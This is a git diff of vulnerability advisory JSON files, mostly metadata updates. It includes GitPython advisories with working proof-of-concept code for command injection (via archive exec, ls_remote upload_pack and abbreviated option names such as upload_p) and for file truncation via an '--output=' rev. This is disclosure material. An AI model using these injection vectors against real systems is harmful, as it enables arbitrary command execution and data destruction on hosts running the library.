597b6bcd83..431892af62 100644 --- a/advisories/BREW-snapcraft-CVE-2026-45409.json +++ b/advisories/BREW-snapcraft-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-45409", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-59890.json b/advisories/BREW-snapcraft-CVE-2026-59890.json index 680776893f..87345fe9d7 100644 --- a/advisories/BREW-snapcraft-CVE-2026-59890.json +++ b/advisories/BREW-snapcraft-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-59890", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-59939.json b/advisories/BREW-snapcraft-CVE-2026-59939.json index 3ba44aa140..ee4b40d94d 100644 --- a/advisories/BREW-snapcraft-CVE-2026-59939.json +++ b/advisories/BREW-snapcraft-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-59939", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-23T21:40:03Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2022-24439.json b/advisories/BREW-tartufo-CVE-2022-24439.json index 4a589298e0..c18e908c0f 100644 --- a/advisories/BREW-tartufo-CVE-2022-24439.json +++ b/advisories/BREW-tartufo-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2022-24439", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-40267.json b/advisories/BREW-tartufo-CVE-2023-40267.json index 45e709e4a4..6b53d52f5c 100644 --- a/advisories/BREW-tartufo-CVE-2023-40267.json +++ b/advisories/BREW-tartufo-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-40267", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-40590.json b/advisories/BREW-tartufo-CVE-2023-40590.json index 9653618e03..9b38213672 100644 --- a/advisories/BREW-tartufo-CVE-2023-40590.json +++ b/advisories/BREW-tartufo-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-40590", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-41040.json b/advisories/BREW-tartufo-CVE-2023-41040.json index 9f997b6341..6c28115bdf 100644 --- a/advisories/BREW-tartufo-CVE-2023-41040.json +++ b/advisories/BREW-tartufo-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-41040", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2024-22190.json b/advisories/BREW-tartufo-CVE-2024-22190.json index 5d386aab21..01c237abcf 100644 --- a/advisories/BREW-tartufo-CVE-2024-22190.json +++ b/advisories/BREW-tartufo-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2024-22190", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-42215.json b/advisories/BREW-tartufo-CVE-2026-42215.json index b20494f497..76ee2f7dd7 100644 --- a/advisories/BREW-tartufo-CVE-2026-42215.json +++ b/advisories/BREW-tartufo-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-42215", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-42284.json b/advisories/BREW-tartufo-CVE-2026-42284.json index 0c1d153784..deeab588be 100644 --- a/advisories/BREW-tartufo-CVE-2026-42284.json +++ b/advisories/BREW-tartufo-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-42284", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-44243.json b/advisories/BREW-tartufo-CVE-2026-44243.json index 9f64f2860d..bc12c624b7 100644 --- a/advisories/BREW-tartufo-CVE-2026-44243.json +++ b/advisories/BREW-tartufo-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-44243", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-44244.json b/advisories/BREW-tartufo-CVE-2026-44244.json index 2058d255a7..d807e928e9 100644 --- a/advisories/BREW-tartufo-CVE-2026-44244.json +++ b/advisories/BREW-tartufo-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-44244", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-67322.json b/advisories/BREW-tartufo-CVE-2026-67322.json index aa41c2dced..b0e2da0d76 100644 --- a/advisories/BREW-tartufo-CVE-2026-67322.json +++ b/advisories/BREW-tartufo-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67322", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-67323.json b/advisories/BREW-tartufo-CVE-2026-67323.json index 97b262ed13..02dc44059d 100644 --- a/advisories/BREW-tartufo-CVE-2026-67323.json +++ b/advisories/BREW-tartufo-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67323", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-67324.json b/advisories/BREW-tartufo-CVE-2026-67324.json index 262c9276db..23fa18b7e1 100644 --- a/advisories/BREW-tartufo-CVE-2026-67324.json +++ b/advisories/BREW-tartufo-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67324", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-67325.json b/advisories/BREW-tartufo-CVE-2026-67325.json index 6c243192bf..f8a66afd02 100644 --- a/advisories/BREW-tartufo-CVE-2026-67325.json +++ b/advisories/BREW-tartufo-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67325", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist 